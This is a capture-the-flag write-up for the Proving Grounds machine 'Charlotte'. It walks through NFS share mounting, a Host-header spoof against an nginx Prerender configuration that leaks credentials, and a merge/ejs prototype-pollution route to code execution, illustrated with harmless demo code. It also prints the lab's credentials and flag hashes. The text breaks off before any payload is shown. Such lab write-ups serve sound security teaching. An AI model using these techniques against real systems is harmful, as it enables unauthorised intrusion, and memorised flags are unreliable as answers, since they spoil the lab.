Summary #

Using the provided credentials we can get initial access over SSH. Alternatively, we can mount the NFS shares available on port 2049, which gives us the source code of an application running on port 8000 that requires credentials. On port 80 we find a README containing the nginx configuration. By changing the Host and User-Agent headers in BURP we’re able to leak credentials, which provide access to the application on port 8000. By abusing two packages (merge and ejs) we can escalate prototype pollution to RCE and get initial access as the www-data user. Once on the target we can abuse a cronjob by deploying our own JavaScript file, which makes lateral movement to the sebastian user possible. Checking our sudo privileges, we can escalate to the root user using sudo in combination with the bash binary.

Specifications #

- Name: CHARLOTTE

- Platform: PG PRACTICE

- Points: 20

- Difficulty: Intermediate

- System overview: Linux charlotte 4.15.0-167-generic #175-Ubuntu SMP Wed Jan 5 01:56:07 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux

- IP address: 192.168.105.184

- OFFSEC provided credentials: sebastian:ThrivingConsoleExcavator235

- HASH: local.txt:b479f6abe2e24ac4fb8bfb9b9ade8454

- HASH: proof.txt:1497aff2b66718f5e803c0d2e34abcf5

Preparation #

First we’ll create a directory structure for our files, set the IP address to a bash variable and ping the target:

## create directory structure

mkdir charlotte && cd charlotte && mkdir enum files exploits uploads tools

## list directory

ls -la

total 28

drwxrwxr-x 7 kali kali 4096 Sep 6 13:01 .

drwxrwxr-x 55 kali kali 4096 Sep 6 13:01 ..

drwxrwxr-x 2 kali kali 4096 Sep 6 13:01 enum

drwxrwxr-x 2 kali kali 4096 Sep 6 13:01 exploits

drwxrwxr-x 2 kali kali 4096 Sep 6 13:01 files

drwxrwxr-x 2 kali kali 4096 Sep 6 13:01 tools

drwxrwxr-x 2 kali kali 4096 Sep 6 13:01 uploads

## set bash variable

ip=192.168.105.184

## ping target to check if it's online

ping $ip

PING 192.168.105.184 (192.168.105.184) 56(84) bytes of data.

64 bytes from 192.168.105.184: icmp_seq=1 ttl=61 time=21.3 ms

64 bytes from 192.168.105.184: icmp_seq=2 ttl=61 time=24.4 ms

^C

--- 192.168.105.184 ping statistics ---

2 packets transmitted, 2 received, 0% packet loss, time 1002ms

rtt min/avg/max/mdev = 21.282/22.823/24.364/1.541 ms

Reconnaissance #

Portscanning #

Using Rustscan we can see what TCP ports are open. This tool is part of my default portscan flow.

## run the rustscan tool

sudo rustscan -a $ip | tee enum/rustscan

.----. .-. .-. .----..---. .----. .---. .--. .-. .-.

| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |

| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |

`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'

The Modern Day Port Scanner.

________________________________________

: http://discord.skerritt.blog :

: https://github.com/RustScan/RustScan :

--------------------------------------

Real hackers hack time ⌛

[~] The config file is expected to be at "/root/.rustscan.toml"

[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers

[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.

Open 192.168.105.184:22

Open 192.168.105.184:80

Open 192.168.105.184:111

Open 192.168.105.184:892

Open 192.168.105.184:2049

Open 192.168.105.184:8000

[~] Starting Script(s)

[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-09-06 13:05 CEST

Initiating Ping Scan at 13:05

Scanning 192.168.105.184 [4 ports]

Completed Ping Scan at 13:05, 0.07s elapsed (1 total hosts)

Initiating Parallel DNS resolution of 1 host. at 13:05

Completed Parallel DNS resolution of 1 host. at 13:05, 0.01s elapsed

DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]

Initiating SYN Stealth Scan at 13:05

Scanning 192.168.105.184 [6 ports]

Discovered open port 80/tcp on 192.168.105.184

Discovered open port 111/tcp on 192.168.105.184

Discovered open port 22/tcp on 192.168.105.184

Discovered open port 892/tcp on 192.168.105.184

Discovered open port 2049/tcp on 192.168.105.184

Discovered open port 8000/tcp on 192.168.105.184

Completed SYN Stealth Scan at 13:05, 0.06s elapsed (6 total ports)

Nmap scan report for 192.168.105.184

Host is up, received echo-reply ttl 61 (0.021s latency).

Scanned at 2025-09-06 13:05:42 CEST for 0s

PORT STATE SERVICE REASON

22/tcp open ssh syn-ack ttl 61

80/tcp open http syn-ack ttl 61

111/tcp open rpcbind syn-ack ttl 61

892/tcp open unknown syn-ack ttl 61

2049/tcp open nfs syn-ack ttl 61

8000/tcp open http-alt syn-ack ttl 61

Read data files from: /usr/share/nmap

Nmap done: 1 IP address (1 host up) scanned in 0.24 seconds

Raw packets sent: 10 (416B) | Rcvd: 7 (292B)

Copy the output of open ports into a file called ports within the files directory.

## edit the `files/ports` file

nano files/ports

## content `ports` file:

22/tcp open ssh syn-ack ttl 61

80/tcp open http syn-ack ttl 61

111/tcp open rpcbind syn-ack ttl 61

892/tcp open unknown syn-ack ttl 61

2049/tcp open nfs syn-ack ttl 61

8000/tcp open http-alt syn-ack ttl 61

Run the following command to get a comma-separated string of all open ports, and paste its output into the NMAP command:

## get a list, comma separated of the open port(s)

cd files && cat ports | cut -d '/' -f1 > ports.txt && awk '{printf "%s,",$0;n++}' ports.txt | sed 's/.$//' > ports && rm ports.txt && cat ports && cd ..

## output previous command

22,80,111,892,2049,8000

## use this output in the `nmap` command below:

sudo nmap -T3 -p 22,80,111,892,2049,8000 -sCV -vv $ip -oN enum/nmap-services-tcp

Output of NMAP:

PORT STATE SERVICE REASON VERSION

22/tcp open ssh syn-ack ttl 61 OpenSSH 7.6p1 Ubuntu 4ubuntu0.6 (Ubuntu Linux; protocol 2.0)

| ssh-hostkey:

| 2048 f0:85:61:65:d3:88:ad:49:6b:38:f4:ac:5b:90:4f:2d (RSA)

| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDOBOAdVPqOAHNMMT7hum6NeCKDAkb5nXrTAAdn1/yEgE3BlC+T/E8CA5vFP1pk/yqsOp0zs71/Ex9naiqotzMCEDQ7xD8mOvzUKvYObYgW9d5vXnHXVVzJLOxMkdFumZ1MSRRh+9vLZgpCsjGd5WbKcuQf0ZDCzKyStf7Pdz3kH67jcznVq2XJBmgDumWRyJFUBXBGddQMZp9F2R6l1E+7aqdOFyFaGjmwiPZPgo06Xzyg+zCcX9p64AdQo89T8n+iWmB/SmJVoT10hlpMcPiZSmhCbVlRcnawuP9W6l083Ip77+hlCyosbxNsTEDfi6Z4BbdTuKKUjcL1wY/OIPRX

| 256 05:80:90:92:ff:9e:d6:0e:2f:70:37:6d:86:76:db:05 (ECDSA)

| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBO+qGz3UVyz1yIKq+CkOCSC5UcE9CU3pJlbpZCRdEjx/08iTQb+mLNxt4M3bZkcibIBuYfzC3xOhLrgrmN9GnQ4=

| 256 c3:57:35:b9:8a:a5:c0:f8:b1:b2:e9:73:09:ad:c7:9a (ED25519)

|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMZqVLR0yDXOzVjU1fOb5aRN3YNtigzHz2dW0TPGu/AP

80/tcp open http syn-ack ttl 61 nginx 1.14.0 (Ubuntu)

|_http-server-header: nginx/1.14.0 (Ubuntu)

|_http-title: Star Cereal

| http-methods:

|_ Supported Methods: GET HEAD POST OPTIONS

111/tcp open rpcbind syn-ack ttl 61 2-4 (RPC #100000)

| rpcinfo:

| program version port/proto service

| 100000 2,3,4 111/tcp rpcbind

| 100000 2,3,4 111/udp rpcbind

| 100003 3 2049/udp nfs

| 100003 3,4 2049/tcp nfs

| 100005 1,2,3 892/tcp mountd

| 100005 1,2,3 892/udp mountd

| 100021 1,3,4 39691/tcp nlockmgr

| 100021 1,3,4 60641/udp nlockmgr

| 100227 3 2049/tcp nfs_acl

|_ 100227 3 2049/udp nfs_acl

892/tcp open mountd syn-ack ttl 61 1-3 (RPC #100005)

2049/tcp open nfs syn-ack ttl 61 3-4 (RPC #100003)

8000/tcp open http syn-ack ttl 61 Node.js Express framework

| http-auth:

| HTTP/1.1 401 Unauthorized\x0D

|_ Basic

|_http-title: Site doesn't have a title (text/html; charset=utf-8).

| http-methods:

|_ Supported Methods: GET HEAD POST OPTIONS

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
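The port-list step earlier in this section can also be expressed outside the shell. Below is a minimal Node.js sketch, assuming the open-port lines are available as a string. The `portsFile` variable and the `toPortList` helper are names made up for this illustration.

```javascript
// Sample input: the open-port lines copied from the scan output.
const portsFile = `
22/tcp open ssh syn-ack ttl 61
80/tcp open http syn-ack ttl 61
111/tcp open rpcbind syn-ack ttl 61
892/tcp open unknown syn-ack ttl 61
2049/tcp open nfs syn-ack ttl 61
8000/tcp open http-alt syn-ack ttl 61
`;

// Hypothetical helper: keep lines of the form "<port>/tcp open ..." and
// join the port numbers with commas, ready to paste after `nmap -p`.
function toPortList(text) {
  return text
    .split("\n")
    .map((line) => line.trim())
    .filter((line) => /^\d+\/tcp\s+open\b/.test(line))
    .map((line) => line.split("/")[0])
    .join(",");
}

const portList = toPortList(portsFile);
console.log(portList); // 22,80,111,892,2049,8000
```

Filtering on the `open` state means banner lines or closed ports that end up in the file by accident are ignored.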

Initial Access #

Initial Access: path 1 #

22/tcp open ssh syn-ack ttl 61 OpenSSH 7.6p1 Ubuntu 4ubuntu0.6 (Ubuntu Linux; protocol 2.0)

| ssh-hostkey:

| 2048 f0:85:61:65:d3:88:ad:49:6b:38:f4:ac:5b:90:4f:2d (RSA)

| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDOBOAdVPqOAHNMMT7hum6NeCKDAkb5nXrTAAdn1/yEgE3BlC+T/E8CA5vFP1pk/yqsOp0zs71/Ex9naiqotzMCEDQ7xD8mOvzUKvYObYgW9d5vXnHXVVzJLOxMkdFumZ1MSRRh+9vLZgpCsjGd5WbKcuQf0ZDCzKyStf7Pdz3kH67jcznVq2XJBmgDumWRyJFUBXBGddQMZp9F2R6l1E+7aqdOFyFaGjmwiPZPgo06Xzyg+zCcX9p64AdQo89T8n+iWmB/SmJVoT10hlpMcPiZSmhCbVlRcnawuP9W6l083Ip77+hlCyosbxNsTEDfi6Z4BbdTuKKUjcL1wY/OIPRX

| 256 05:80:90:92:ff:9e:d6:0e:2f:70:37:6d:86:76:db:05 (ECDSA)

| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBO+qGz3UVyz1yIKq+CkOCSC5UcE9CU3pJlbpZCRdEjx/08iTQb+mLNxt4M3bZkcibIBuYfzC3xOhLrgrmN9GnQ4=

| 256 c3:57:35:b9:8a:a5:c0:f8:b1:b2:e9:73:09:ad:c7:9a (ED25519)

|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIMZqVLR0yDXOzVjU1fOb5aRN3YNtigzHz2dW0TPGu/AP

Because we got credentials (sebastian:ThrivingConsoleExcavator235) from OFFSEC, we first try to log in using SSH on TCP port 22. Connect with the following command and paste the password when asked. Once logged in, we find the local.txt file in the home directory of the sebastian user.

## connect to the target using provided credentials `sebastian:ThrivingConsoleExcavator235`

ssh sebastian@$ip

The authenticity of host '192.168.105.184 (192.168.105.184)' can't be established.

ED25519 key fingerprint is SHA256:BFNHiG0TgvKeKOogN97RoTQRycbNoZgxixjThnW0398.

This host key is known by the following other names/addresses:

~/.ssh/known_hosts:76: [hashed name]

Are you sure you want to continue connecting (yes/no/[fingerprint])? yes

Warning: Permanently added '192.168.105.184' (ED25519) to the list of known hosts.

sebastian@192.168.105.184's password:

Welcome to Ubuntu 18.04.6 LTS (GNU/Linux 4.15.0-167-generic x86_64)

* Documentation: https://help.ubuntu.com

* Management: https://landscape.canonical.com

* Support: https://ubuntu.com/advantage

System information as of Sat Sep 6 07:07:55 EDT 2025

System load: 0.0 Processes: 178

Usage of /: 30.1% of 15.68GB Users logged in: 0

Memory usage: 34% IP address for ens192: 192.168.105.184

Swap usage: 0%

0 updates can be applied immediately.

The programs included with the Ubuntu system are free software;

the exact distribution terms for each program are described in the

individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by

applicable law.

$

## list content current directory

$ ls -la

total 44

drwxr-xr-x 5 sebastian sebastian 4096 Sep 6 07:07 .

drwxr-xr-x 3 root root 4096 Feb 16 2022 ..

-rwxr-xr-x 1 sebastian sebastian 641 Jan 15 2022 audit.js

lrwxrwxrwx 1 sebastian sebastian 9 Feb 16 2022 .bash_history -> /dev/null

-rw-r--r-- 1 sebastian sebastian 220 Apr 4 2018 .bash_logout

-rw-r--r-- 1 sebastian sebastian 3771 Apr 4 2018 .bashrc

drwx------ 2 sebastian sebastian 4096 Sep 6 07:07 .cache

drwx------ 3 sebastian sebastian 4096 Sep 6 07:07 .gnupg

-rw-r--r-- 1 sebastian sebastian 33 Sep 6 04:11 local.txt

drwxr-xr-x 95 sebastian sebastian 4096 Feb 16 2022 node_modules

-rw------- 1 sebastian sebastian 67 Jan 11 2022 package.json

-rw-r--r-- 1 sebastian sebastian 807 Apr 4 2018 .profile

## print `local.txt`

$ cat local.txt

b479f6abe2e24ac4fb8bfb9b9ade8454

Initial Access: path 2 #

80/tcp open http syn-ack ttl 61 nginx 1.14.0 (Ubuntu)

|_http-server-header: nginx/1.14.0 (Ubuntu)

|_http-title: Star Cereal

| http-methods:

|_ Supported Methods: GET HEAD POST OPTIONS

2049/tcp open nfs syn-ack ttl 61 3-4 (RPC #100003)

8000/tcp open http syn-ack ttl 61 Node.js Express framework

| http-auth:

| HTTP/1.1 401 Unauthorized\x0D

|_ Basic

|_http-title: Site doesn't have a title (text/html; charset=utf-8).

| http-methods:

|_ Supported Methods: GET HEAD POST OPTIONS

On port 2049 there is an NFS service. Using showmount we can list its exported shares. There are two: /srv/nfs4/backups and /srv/nfs4. Let’s make some directories and mount the shares on them to see what they contain.

## list shares using `showmount`

showmount -e $ip

Export list for 192.168.105.184:

/srv/nfs4/backups *

/srv/nfs4 *

## change directory

cd files

## make two directories to use for NFS mounting

mkdir mnt_backups mnt

## mount `/srv/nfs4/backups` to `./mnt_backups`

sudo mount -t nfs -o nolock $ip:/srv/nfs4/backups ./mnt_backups

## mount `/srv/nfs4` to `./mnt`

sudo mount -t nfs -o nolock $ip:/srv/nfs4 ./mnt

## print content of `files`, `./mnt_backups` and `./mnt`, pipe to md5sum

find . | xargs md5sum

md5sum: .: Is a directory

md5sum: ./mnt_backups: Is a directory

404dcca205ef3f340725e6d0faccac9b ./mnt_backups/._index.js

e3baa7ec13828fd43e8de333ab12323c ./mnt_backups/._package.json

md5sum: ./mnt_backups/templates: Is a directory

bd1cf2ba6c1e3136c02c504146b57b3e ./mnt_backups/templates/._index.ejs

62af5e2d45d8991279150b3f3f0b3369 ./mnt_backups/templates/index.ejs

00cc3b567221607162f6d98e317028cd ./mnt_backups/index.js

bda237b2acf6ad1c759894cf12c1fafb ./mnt_backups/._templates

625cfa1c4a8bf63e24bc8f051edfc35f ./mnt_backups/package.json

3cb756282fe78e633b37afbe0b659ae2 ./ports

md5sum: ./mnt: Is a directory

md5sum: ./mnt/backups: Is a directory

404dcca205ef3f340725e6d0faccac9b ./mnt/backups/._index.js

e3baa7ec13828fd43e8de333ab12323c ./mnt/backups/._package.json

md5sum: ./mnt/backups/templates: Is a directory

bd1cf2ba6c1e3136c02c504146b57b3e ./mnt/backups/templates/._index.ejs

62af5e2d45d8991279150b3f3f0b3369 ./mnt/backups/templates/index.ejs

00cc3b567221607162f6d98e317028cd ./mnt/backups/index.js

bda237b2acf6ad1c759894cf12c1fafb ./mnt/backups/._templates

625cfa1c4a8bf63e24bc8f051edfc35f ./mnt/backups/package.json
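With only a handful of files the hashes can be compared by eye. For larger trees, a minimal Node.js sketch along these lines could do the comparison, assuming the md5sum output is available as text. The `hashesUnder` helper is a made-up name for this illustration, and the "Is a directory" lines are left out of the sample.

```javascript
// md5sum output from above, without the "Is a directory" messages.
const md5Output = `
404dcca205ef3f340725e6d0faccac9b ./mnt_backups/._index.js
e3baa7ec13828fd43e8de333ab12323c ./mnt_backups/._package.json
bd1cf2ba6c1e3136c02c504146b57b3e ./mnt_backups/templates/._index.ejs
62af5e2d45d8991279150b3f3f0b3369 ./mnt_backups/templates/index.ejs
00cc3b567221607162f6d98e317028cd ./mnt_backups/index.js
bda237b2acf6ad1c759894cf12c1fafb ./mnt_backups/._templates
625cfa1c4a8bf63e24bc8f051edfc35f ./mnt_backups/package.json
3cb756282fe78e633b37afbe0b659ae2 ./ports
404dcca205ef3f340725e6d0faccac9b ./mnt/backups/._index.js
e3baa7ec13828fd43e8de333ab12323c ./mnt/backups/._package.json
bd1cf2ba6c1e3136c02c504146b57b3e ./mnt/backups/templates/._index.ejs
62af5e2d45d8991279150b3f3f0b3369 ./mnt/backups/templates/index.ejs
00cc3b567221607162f6d98e317028cd ./mnt/backups/index.js
bda237b2acf6ad1c759894cf12c1fafb ./mnt/backups/._templates
625cfa1c4a8bf63e24bc8f051edfc35f ./mnt/backups/package.json
`;

// Hypothetical helper: map "path relative to prefix" -> md5 hash for all
// files whose path starts with the given prefix.
function hashesUnder(output, prefix) {
  const result = new Map();
  for (const line of output.split("\n")) {
    const match = line.trim().match(/^([0-9a-f]{32})\s+(\S+)$/);
    if (!match) continue;
    const [, hash, file] = match;
    if (file.startsWith(prefix)) result.set(file.slice(prefix.length), hash);
  }
  return result;
}

const backupsShare = hashesUnder(md5Output, "./mnt_backups/");
const nestedBackups = hashesUnder(md5Output, "./mnt/backups/");

// The trees match when they hold the same files with the same hashes.
const identical =
  backupsShare.size === nestedBackups.size &&
  [...backupsShare].every(([file, hash]) => nestedBackups.get(file) === hash);

console.log(identical); // true
```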

Looking at the md5sums, all files in both shares are the same. The ./mnt/backups/index.js file is probably the application running on port 8000 (see app.listen). It also reveals these endpoints: /, /change_status and /reset. The /change_status endpoint requires a POST request, the others require a GET request. The ./mnt/backups/package.json file shows the versions of the packages used.

## print `./mnt/backups/index.js`

cat ./mnt/backups/index.js

const express = require('express')

const bodyParser = require('body-parser')

const merge = require('merge')

const ejs = require('ejs')

const auth = require('express-basic-auth')

const app = express()

app.use(bodyParser.json())

const user = process.env.DEATH_STAR_USERNAME

const pass = process.env.DEATH_STAR_PASSWORD

app.use(auth({

users: { [user]: pass },

challenge: true

}))

let systems = {

status: "online",

lazers: "online",

guns: "online",

shields: "online",

turrets: "online"

}

// Static folder

app.use("/static", express.static(__dirname + "/static"));

// Homepage

app.get("/", async (req, res) => {

const html = await ejs.renderFile(__dirname + "/templates/index.ejs", { systems });

res.end(html);

})

// API

app.post("/change_status", (req, res) => {

Object.entries(req.body).forEach(([system, status]) => {

if (system === "status") {

res.status(401).end("Permission Denied.");

return

}

});

systems = merge.recursive(systems, req.body);

if ("offline" in Object.values(systems)) {

systems.status = "offline"

}

res.json(systems);

})

app.get("/reset", (req, res) => {

systems = {

status: "online",

lazers: "online",

guns: "online",

shields: "online",

turrets: "online"

}

res.redirect(301, "/");

})

app.listen(8000, () => {

console.log(`App listening at port 8000`);

})

## print `./mnt/backups/package.json` to list used packages

cat ./mnt/backups/package.json

{

"dependencies": {

"ejs": "3.1.6",

"express": "4.17.1",

"merge": "2.1.0",

"express-basic-auth": "1.2.0"

}

}
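Two details in the `index.js` listing above are easy to miss. The sketch below re-creates only the relevant checks, not the application itself, and the helper name `topLevelKeysBlocked` is made up for this illustration. It shows that the guard in `/change_status` only looks at top-level keys, and that `"offline" in Object.values(systems)` tests array indices rather than values.

```javascript
// Mirrors the guard from /change_status: only top-level keys are inspected.
function topLevelKeysBlocked(body) {
  return Object.keys(body).some((system) => system === "status");
}

// A direct attempt to set `status` is caught ...
const direct = JSON.parse('{"status": "offline"}');
// ... but anything nested under another key is never examined.
const nested = JSON.parse('{"shields": {"anything": {"status": "offline"}}}');

const directBlocked = topLevelKeysBlocked(direct);
const nestedBlocked = topLevelKeysBlocked(nested);
console.log(directBlocked, nestedBlocked); // true false

// The `in` operator checks property names. For an array those are the
// indices "0", "1", ..., so the check is false even when the value is there.
const systems = { status: "online", lazers: "offline" };
const inCheck = "offline" in Object.values(systems);
const includesCheck = Object.values(systems).includes("offline");
console.log(inCheck, includesCheck); // false true
```

In other words, nested keys in the request body reach the merge call without being inspected by the guard.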





Browsing to the application on port 8000 (http://192.168.105.184:8000) prompts us for a username and password, so this doesn’t help us any further yet.

On port 80 we find a website called Star Cereal, but there isn’t any functionality we can (ab)use.

So let’s run gobuster against this URL and see what we can find. Gobuster warns that responses with length 5707 should be excluded, so we add that to the command. We find two files and a directory, /admin.

## running `gobuster` and excluding response length 5707

gobuster dir -t 100 -u http://$ip:80/ --exclude-length 5707 -w /opt/SecLists/Discovery/Web-Content/raft-large-directories.txt | tee enum/raft-large-dir-raw-80

tee: enum/raft-large-dir-raw-80: No such file or directory

===============================================================

Gobuster v3.8

by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)

===============================================================

[+] Url: http://192.168.105.184:80/

[+] Method: GET

[+] Threads: 100

[+] Wordlist: /opt/SecLists/Discovery/Web-Content/raft-large-directories.txt

[+] Negative Status codes: 404

[+] Exclude Length: 5707

[+] User Agent: gobuster/3.8

[+] Timeout: 10s

===============================================================

Starting gobuster in directory enumeration mode

===============================================================

/admin (Status: 200) [Size: 156]

/README (Status: 200) [Size: 2872]

/LICENSE (Status: 200) [Size: 1067]

===============================================================

Finished

===============================================================



Browsing to this URL (http://192.168.105.184/admin) gives us the following unauthorized error. Apparently only internal clients are allowed to access this page.

So this also doesn’t go anywhere. Let’s download the two files and see what they are. The only interesting file is the README file.

## change directory

cd files

## download the `README` file

wget http://$ip/README

--2025-09-06 13:29:22-- http://192.168.105.184/README

Connecting to 192.168.105.184:80... connected.

HTTP request sent, awaiting response... 200 OK

Length: 2872 (2.8K) [text/plain]

Saving to: ‘README’

README 100%[===================================================================>] 2.80K --.-KB/s in 0s

2025-09-06 13:29:22 (115 MB/s) - ‘README’ saved [2872/2872]

This is the content of this README file:

# Star Cereal Product Page

A simple page to promote our product.

## Developer Notes

- **[5 Oct 2021]** So, I found this neat service called [Prerender.io](https://prerender.io/). It performs something called dynamic rendering to improve SEO. It renders JavaScript on the server-side, returning only a static HTML file for web crawlers like Google's GoogleBot, with all JavaScript stripped.

- **[3 Oct 2021]** I've disabled the login feature for now. We will build that feature when we get better at basic PHP security. Until then, all sensitive endpoints are accessible only to us.

## Prerender.io Configuration

Following the official [guide](https://prerender.io/how-to-install-prerender/), I have implemented the official `nginx.conf`, with some changes to accomodate our server setup:

events {

worker_connections 1024;

}

http {

include /etc/nginx/mime.types;

sendfile on;

server {

listen 80;

root /var/www/html;

index index.html;

location / {

try_files $uri @prerender;

}

location ~ \.php$ {

try_files /dev/null @prerender;

}

location @prerender {

proxy_set_header X-Real-IP $remote_addr;

set $prerender 0;

if ($http_user_agent ~* "googlebot|bingbot|yandex|baiduspider|twitterbot|facebookexternalhit|rogerbot|linkedinbot|embedly|quora link preview|showyoubot|outbrain|pinterest\/0\.|pinterestbot|slackbot|vkShare|W3C_Validator|whatsapp") {

set $prerender 1;

}

if ($args ~ "_escaped_fragment_") {

set $prerender 1;

}

if ($http_user_agent ~ "Prerender") {

set $prerender 0;

}

if ($uri ~* "\.(js|css|xml|less|png|jpg|jpeg|gif|pdf|doc|txt|ico|rss|zip|mp3|rar|exe|wmv|doc|avi|ppt|mpg|mpeg|tif|wav|mov|psd|ai|xls|mp4|m4a|swf|dat|dmg|iso|flv|m4v|torrent|ttf|woff|svg|eot)") {

set $prerender 0;

}

resolver 8.8.8.8;

if ($prerender = 1) {

rewrite .* /$scheme://$host$request_uri? break;

proxy_pass http://localhost:3000;

}

if ($prerender = 0) {

proxy_pass http://localhost:7000;

}

}

}

}

Basically, if we determine that a web crawler is crawling our site, we simply rewrite the request according to the URL scheme, host header and the original request URI, then forward it to the Prerender service.

The Prerender service then uses Chromium to visit the requested URL, returning the web crawler a static HTML file with all scripts removed.

It's from the official guide, so I can't see this leading to any vulnerabilities? Fingers crossed? I'm not really familiar with Nginx configuration files so I'm not sure.



The README shows the nginx configuration of the target. A User-Agent such as googlebot sets the $prerender variable to 1. When $prerender is 1, the rewrite rule builds the URL that is handed to the Prerender service from $host, which nginx takes from the Host header of our request. Setting the Host header to localhost therefore makes the Prerender service fetch the page from localhost, so the request should appear to come from an internal client.

if ($prerender = 1) {

rewrite .* /$scheme://$host$request_uri? break;

proxy_pass http://localhost:3000;

}
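To make the routing decision easier to follow, here is a minimal Node.js model of the `@prerender` location. It is a sketch under assumptions, not nginx itself: the `routeRequest` function is a made-up name, both regexes are shortened versions of the ones in the README, and edge cases of nginx variable handling are ignored.

```javascript
// Shortened crawler list; the README's regex has more entries.
// nginx `~*` is a case-insensitive match, hence the `i` flag.
const CRAWLER_UA = /googlebot|bingbot|yandex|baiduspider|twitterbot/i;
// Shortened static-extension list, also matched case-insensitively.
const STATIC_EXT = /\.(js|css|xml|png|jpg|gif|pdf|txt|ico)/i;

// Hypothetical model: returns the upstream and the path that gets proxied.
function routeRequest({ scheme, host, requestUri, userAgent }) {
  const [uri, args = ""] = requestUri.split("?");
  let prerender = 0;
  if (CRAWLER_UA.test(userAgent)) prerender = 1;
  if (args.includes("_escaped_fragment_")) prerender = 1;
  if (userAgent.includes("Prerender")) prerender = 0; // `~` is case-sensitive
  if (STATIC_EXT.test(uri)) prerender = 0;

  if (prerender === 1) {
    // rewrite .* /$scheme://$host$request_uri? break;
    return {
      upstream: "http://localhost:3000",
      path: `/${scheme}://${host}${requestUri}`,
    };
  }
  return { upstream: "http://localhost:7000", path: requestUri };
}

// A normal browser request goes to the regular backend.
const normal = routeRequest({
  scheme: "http",
  host: "192.168.105.184",
  requestUri: "/admin",
  userAgent: "Mozilla/5.0",
});

// A crawler User-Agent plus a spoofed Host header changes the target URL.
const spoofed = routeRequest({
  scheme: "http",
  host: "localhost",
  requestUri: "/admin",
  userAgent: "googlebot",
});

console.log(normal.upstream, normal.path);   // http://localhost:7000 /admin
console.log(spoofed.upstream, spoofed.path); // http://localhost:3000 /http://localhost/admin
```

The second result is the interesting one: the Prerender service is asked to visit `http://localhost/admin`, a URL whose host part is fully controlled by the client.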

Using this knowledge, let’s visit the /admin URL (http://192.168.105.184/admin) and intercept the request with BURP. Send the intercepted request to the Repeater tab. Now change the Host header to localhost and the User-Agent header to googlebot, and press Send.

This gets us a response with a username and password, UndeadDingoGrumbling369:ShortySkinlessTrustee456, which lets us log in to the application on port 8000 (http://192.168.105.184:8000/).
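The application uses HTTP Basic authentication, so these credentials end up base64-encoded in the Authorization header of the requests shown later. A small Node.js sketch of that encoding (the variable names are chosen for this illustration):

```javascript
// Credentials leaked from the /admin response.
const username = "UndeadDingoGrumbling369";
const password = "ShortySkinlessTrustee456";

// HTTP Basic authentication: "Basic " followed by base64("username:password").
const token = Buffer.from(`${username}:${password}`, "utf8").toString("base64");
const authorizationHeader = `Basic ${token}`;
console.log(authorizationHeader);

// Decoding works the other way around, e.g. to check a header seen in a proxy.
const decoded = Buffer.from(token, "base64").toString("utf8");
console.log(decoded === `${username}:${password}`); // true
```

Base64 is an encoding, not encryption, so anyone who can read the header can recover the password.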

As already discussed, there are some packages used within this application.

## print `./mnt/backups/package.json` to list used packages

cat ./mnt/backups/package.json

{

"dependencies": {

"ejs": "3.1.6",

"express": "4.17.1",

"merge": "2.1.0",

"express-basic-auth": "1.2.0"

}

}

When we search for a vulnerability in the merge package, we find a prototype pollution vulnerability that applies if recursive merge is used (https://security.snyk.io/vuln/SNYK-JS-MERGE-1042987). Looking at the code in index.js, the application does call merge.recursive within the /change_status endpoint. The ejs package can then escalate the prototype pollution to RCE through its outputFunctionName option.
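The mechanism can be illustrated without the real packages. In the sketch below, `naiveRecursiveMerge` is a simplified stand-in for an unguarded recursive merge (it is not the source of the merge package), and `toyCompile` is a toy that pastes an option into generated code, similar in spirit to what is described for outputFunctionName. All names, including the `toyFunctionName` option, are assumptions made for this illustration, and the injected code only sets a harmless flag.

```javascript
// Simplified stand-in for a recursive merge that does not filter `__proto__`.
function naiveRecursiveMerge(target, source) {
  for (const key of Object.keys(source)) {
    const value = source[key];
    const bothObjects =
      value !== null && typeof value === "object" &&
      target[key] !== null && typeof target[key] === "object";
    if (bothObjects) {
      // For key "__proto__", target[key] is Object.prototype.
      naiveRecursiveMerge(target[key], value);
    } else {
      target[key] = value;
    }
  }
  return target;
}

const systems = { status: "online", shields: "online" };

// Step 1: turn `shields` into an object so the merge can descend into it.
naiveRecursiveMerge(systems, JSON.parse('{"shields": {"hekk": 1}}'));

// Step 2: JSON.parse keeps "__proto__" as an ordinary own key, so the merge
// walks from systems.shields into Object.prototype.
const payload =
  '{"shields": {"__proto__": {"toyFunctionName": ' +
  '"x = 0; globalThis.toyInjected = true; var y"}}}';
naiveRecursiveMerge(systems, JSON.parse(payload));

// Toy "template compiler": the option text is concatenated into source code.
function toyCompile(opts) {
  let source = "var __append = function () {};\n";
  if (opts.toyFunctionName) {
    source += "var " + opts.toyFunctionName + " = __append;\n";
  }
  source += "return 'rendered';";
  return new Function(source);
}

// The caller passes empty options, yet the polluted prototype supplies one.
const rendered = toyCompile({})();
const injectedCodeRan = globalThis.toyInjected === true;
console.log(rendered, injectedCodeRan); // rendered true

// Clean up so the rest of the process is unaffected.
delete Object.prototype.toyFunctionName;
delete globalThis.toyInjected;
const cleanedUp = {}.toyFunctionName === undefined;
```

Step 1 matters in this model: while `shields` is still the string "online", the merge simply overwrites it and never reaches the prototype.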

## get the local IP address on tun0

ip a | grep -A 10 tun0

5: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 500

link/none

